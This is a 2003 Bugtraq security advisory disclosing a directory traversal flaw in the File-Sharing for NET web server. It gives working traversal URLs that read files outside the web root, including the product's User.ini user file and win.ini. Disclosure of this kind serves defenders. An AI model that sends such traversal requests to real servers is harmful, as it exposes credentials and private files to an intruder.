[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Minihttpserver File-Sharing for NET Directory Traversal Vulnerability

To: bugtraq@securityfocus.com
Subject: Minihttpserver File-Sharing for NET Directory Traversal Vulnerability
From: Bahaa Naamneh <b_naamneh@hotmail.com>
Date: 3 Oct 2003 13:14:28 -0000


Minihttpserver File-Sharing for NET Directory Traversal Vulnerability


Affected Systems: File-Sharing for NET

version: 1.5 (and possibly earlier versions)

Vendor: Minihttpserver - http://www.minihttpserver.net

Issue:  Directory Traversal Vulnerability

Released: 2 October 2003


Introduction:
=============
"File Sharing for net is a complete, secure web server that shares 
your business documents and files over the web: remote users only 
need browsers to view your files. Share, transfer files securely with 
colleagues."

- Vendors Description
   [ http://www.minihttpserver.net ]


Details:
========
File-Sharing for NET has a Directory Traversal Vulnerability Using 
the string '../' or '..\' in a URL, an attacker can gain read access 
to any file outside of the intended web-published file system 
directory.

http://[target]/../../../existing_file

http://[target]\..\..\..\existing_file

Examples:
---------
http://127.0.0.1/../../../ Program Files/FileSharing for NET/User.ini

http://127.0.0.1/../../../windows/win.ini


Vendor status:
==============
The vendor has been informed, and they are fixing this bug.
The updated version, when released, can be downloaded from:

http://www.minihttpserver.net/fbbs.zip


Discovered by/Credit:
=====================
Bahaa Naamneh
b_naamneh@hotmail.com
http://www.bsecurity.tk

Prev by Date: OpenServer 5.0.7 : OpenSSH: multiple buffer handling problems
Next by Date: New IE crash: CSS + HTML
Previous by thread: OpenServer 5.0.7 : OpenSSH: multiple buffer handling problems
Next by thread: New IE crash: CSS + HTML
Index(es):
- Date
- Thread